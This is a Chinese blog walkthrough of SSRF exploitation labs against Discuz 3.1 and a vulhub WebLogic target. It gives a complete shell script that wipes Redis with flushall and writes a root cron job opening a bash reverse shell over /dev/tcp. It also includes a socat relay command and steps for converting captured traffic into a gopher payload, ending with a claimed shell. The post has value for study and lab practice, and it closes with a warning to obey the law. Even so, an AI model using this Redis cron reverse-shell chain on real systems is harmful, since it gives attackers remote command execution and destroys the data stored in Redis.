【SSRF漏洞】实战演示 超详细讲解

博主昵称:摆烂阳

博主主页链接https://blog.csdn.net/qinshuoyang1?type=blog
‍博主研究方向:web渗透测试 、python编程
博主寄语:希望本篇文章能给大家带来帮助,有不足的地方,希望友友们给予指导

————————————————

实战演练

  • 一、实战discuz3.1版本的ssrf漏洞
    • 1、准备工作
    • 2、开始实战
  • 二、实操vulhub靶场的ssrf漏洞
    • 1、准备工作
    • 2、开始实战
    • 三、本章小结

【SSRF漏洞】实战演示 超详细讲解_第1张图片

一、实战discuz3.1版本的ssrf漏洞

1、准备工作

第一步:

创建一个后缀为.sh的文件

文件内容为:

redis-cli -h $1 -p $2 flushall echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/ip/端口 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1 redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit


第二步:

2、运行该.sh文件

【SSRF漏洞】实战演示 超详细讲解_第2张图片

此时可以看到kali可以监听到

【SSRF漏洞】实战演示 超详细讲解_第3张图片

2、开始实战

第一步:

设置监听

先yum下载socat工具

yum install socat

Payload:

socat -v tcp-listen:端口,fork tcp-connect:localhost:6379


第二步:

4、再次发送请求

Payload

bash ssrf.sh ip 端口

【SSRF漏洞】实战演示 超详细讲解_第4张图片
【SSRF漏洞】实战演示 超详细讲解_第5张图片

此时已经成功设置定时任务

第三步:

创建一个日志文件,保存数据

【SSRF漏洞】实战演示 超详细讲解_第6张图片

ps:注意格式一定要为unix 可以用 set ff 进行查看

在这里插入图片描述

第四步:

利用py脚本将日志文件中的内容进行转换为数据包

Payload:

python redis_ssrf.py 1.log

在这里插入图片描述
第五步:

将该数据包保存在kali的文件中

【SSRF漏洞】实战演示 超详细讲解_第7张图片
第六步:

kali开启监听,并在目标网站访问gopher.php文件

【SSRF漏洞】实战演示 超详细讲解_第8张图片
成功获取shell

二、实操vulhub靶场的ssrf漏洞

1、准备工作

(1)、 开启apache和sql服务,并关闭防火墙

【SSRF漏洞】实战演示 超详细讲解_第9张图片

(2)、开启redis服务

【SSRF漏洞】实战演示 超详细讲解_第10张图片

(3)、进入vulhub/weblogic/ssrf 目录下

在这里插入图片描述

(4)、打开docker服务

在这里插入图片描述

(5)、打开docker容器,并查看端口

打开docker容器:

docker-compose up -d

查看端口

docker-compose ps

ps:如果打开docker容器时发生错误,重启一下docker服务便可解决

【SSRF漏洞】实战演示 超详细讲解_第11张图片

2、开始实战

1、进入README.md文件中查看教程

【SSRF漏洞】实战演示 超详细讲解_第12张图片

2、进去目标网址,进行抓包

【SSRF漏洞】实战演示 超详细讲解_第13张图片

3、发送到repeater模块中,并修改信息

【SSRF漏洞】实战演示 超详细讲解_第14张图片

4、此时可以在centos中发现已经成功写入计划任务

【SSRF漏洞】实战演示 超详细讲解_第15张图片

5、在kali中开启监听

【SSRF漏洞】实战演示 超详细讲解_第16张图片
此时便已经获取了centos的shell

三、本章小结

通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。

另外警惕大家,网络并非法外之地,大家要谨遵网络安全法,不要做违纪违规的事情!

————————————————

SSRF原理教程跳转链接!!!!

你可能感兴趣的:(web渗透,安全,web安全)